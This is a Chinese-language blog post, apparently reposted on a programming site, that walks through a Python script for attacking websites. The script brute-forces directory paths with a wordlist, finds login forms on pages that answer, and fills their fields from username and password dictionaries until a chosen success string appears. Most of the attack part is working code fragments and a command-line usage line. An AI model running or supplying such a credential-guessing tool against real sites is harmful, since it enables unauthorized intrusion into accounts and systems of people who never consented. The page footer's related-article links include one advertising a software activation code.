编程 Python

python遍历路径破解表单的示例

Posted in Python onNovember 21, 2020

首先是利用python遍历路径，采用字典爆破的形式，当然如果只是单纯的爆破路径，简单写一个多线程脚本就行了。这里考虑如何对爆破到的路径进行第二步利用，此处尝试对猜解到的路径进行表单发现及登陆爆破处理。

首先就是路径爆破，采用多线程队列，爆破路径，判断形式为200响应码。

while not self._queue.empty():
      queue = self._queue.get(timeout=0.5)
      try:
        r = requests.get(self.url+queue,timeout=5, headers=self.headers)
        if r.status_code == 200:
          print "[200] %s" %(queue)
          soup = BeautifulSoup(r.content,'html.parser')
          if soup.find('form'):
            self.brute(soup, queue)

猜解到路径后交给brute方法处理，方法实现了一个css选择器，获取form表单中的input字段标签，提取标签参数组合成post参数值，然后提取表单中的action跳转页面，如没有页面默认在当前表单页提交。

input = soup.select("form input")
      for i in input:
        try:
          if i.attrs['type'] == "hidden":
            name, value = i.attrs['name'], i.attrs['value']
            list_post.append(name+'='+value)
          elif i.attrs['type'] == 'password':
            name = i.attrs['name']
            list_post.append(name+'=$$$')
          else:
            name = i.attrs['name']
            list_post.append(name+'=%%%')
        except:
          continue
      for i in list_post:
        post = post + i + '&'
      action = soup.find_all('form')
      for i in action:
        if i['action']:
          actiontag = i['action']
        else:
          actiontag = queue
      self.payload(post, actiontag)

获取参数值后，交给payload方法处理登陆，采用requests库的session登陆。获取cookie，先采用session请求获取cookie后，再采用session携带cookie进行请求提交。然后对输入的验证值进行判断是否为登陆成功。

for name in self.username():
      post_user = post.replace('%%%',name.strip())
      for pwd in self.password():
        post_pwd = post_user.replace('$$$',pwd.strip())
        session = requests.Session()
        session.get(self.url+'/'+action, headers=self.headers, verify=False)
        r = session.post(self.url+'/'+action, data=post_pwd, headers=self.headers, verify=False)
        if self.word in r.content:
          print '[username] %s' %name +'\r' + '[password] %s' %pwd
          return

为了判断是否登陆成功，采用的人为输入判断字符串的形式。也就是脚本执行形式为

python xxx.py http://xxxx.com xxxxx

以上就是python遍历路径破解表单的示例的详细内容，更多关于python 破解表单的资料请关注三水点靠木其它相关文章！

python遍历路径破解表单的示例

- Author -

Misaki''s

声明：登载此文出于传递更多信息之目的，并不意味着赞同其观点或证实其描述。

Python 相关文章推荐

用Python的SimPy库简化复杂的编程模型的介绍

Apr 13 Python

python编写爬虫小程序

May 14 Python

Python实现包含min函数的栈

Apr 29 Python

浅谈Python爬取网页的编码处理

Nov 04 Python

python算法表示概念扫盲教程

Apr 13 Python

Python人脸识别第三方库face_recognition接口说明文档

May 03 Python

python如何以表格形式打印输出的方法示例

Jun 21 Python

使用python将mysql数据库的数据转换为json数据的方法

Jul 01 Python

python 三元运算符使用解析

Sep 16 Python

Django使用Profile扩展User模块方式

May 14 Python

plt.figure()参数使用详解及运行演示

Jan 08 Python

PyTorch 如何自动计算梯度

May 23 Python

Python如何批量生成和调用变量

Nov 21 #Python

在终端启动Python时报错的解决方案

Nov 20 #Python

python 批量下载bilibili视频的gui程序

Nov 20 #Python

Python ellipsis 的用法详解

Nov 20 #Python

python 动态渲染 mysql 配置文件的示例

Nov 20 #Python

Python paramiko使用方法代码汇总

Nov 20 #Python

分享一枚pycharm激活码适用所有pycharm版本我的pycharm2020.2.3激活成功

Nov 20 #Python

You might like

php中突破基于HTTP_REFERER的防盗链措施(stream_context_create)

2011/03/29 PHP

php实现上传图片生成缩略图示例

2014/04/13 PHP

利用PHP函数计算中英文字符串长度的方法

2014/11/11 PHP

php命令行（cli）下执行PHP脚本文件的相对路径的问题解决方法

2015/05/25 PHP

HTML中不支持静态Expando的元素的问题

2007/03/08 Javascript

使用Jquery搭建最佳用户体验的登录页面之记住密码自动登录功能（含后台代码）

2011/07/10 Javascript

javascript中方便增删改cookie的一个类

2012/10/11 Javascript

JavaScript比较两个对象是否相等的方法

2015/02/06 Javascript

javascript强制点击广告的方法

2015/02/06 Javascript

jQuery插件bxSlider实现响应式焦点图

2015/04/12 Javascript

javascript搜索框效果实现方法

2015/05/14 Javascript

一道常被人轻视的web前端常见面试题(JS)

2016/02/15 Javascript

jQuery鼠标事件总结

2016/10/13 Javascript

vue2.0结合DataTable插件实现表格动态刷新的方法详解

2017/03/17 Javascript

Bootstrap DateTime Picker日历控件简单应用

2017/03/25 Javascript

深入理解Angularjs中$http.post与$.post

2017/05/19 Javascript

Vue2.0 axios前后端登陆拦截器(实例讲解)

2017/10/27 Javascript

JavaScript实现三级级联特效

2017/11/05 Javascript

iSlider手机端图片滑动切换插件使用详解

2019/12/24 Javascript

python optparse模块使用实例

2015/04/09 Python

python实现简易版计算器

2020/06/22 Python

解决matplotlib库show()方法不显示图片的问题

2018/05/24 Python

django框架实现一次性上传多个文件功能示例【批量上传】

2019/06/19 Python

python logging模块的使用总结

2019/07/09 Python

解析python实现Lasso回归

2019/09/11 Python

pip 安装库比较慢的解决方法(国内镜像)

2019/10/06 Python

python matplotlib饼状图参数及用法解析

2019/11/04 Python

Python多进程编程常用方法解析

2020/03/26 Python

Python 中如何写注释

2020/08/28 Python

美国著名首饰网站：BaubleBar

2016/08/29 全球购物

StubHub墨西哥：购买和出售您的门票

2016/09/17 全球购物

机械工程师的岗位职责

2013/11/17 职场文书

写给老婆的检讨书

2014/02/21 职场文书

中学生2014国庆节演讲稿：不屈的民族

2014/09/21 职场文书

小学感恩主题班会

2015/08/12 职场文书

什么是clearfix (一文搞清楚css清除浮动clearfix)

2023/05/21 HTML / CSS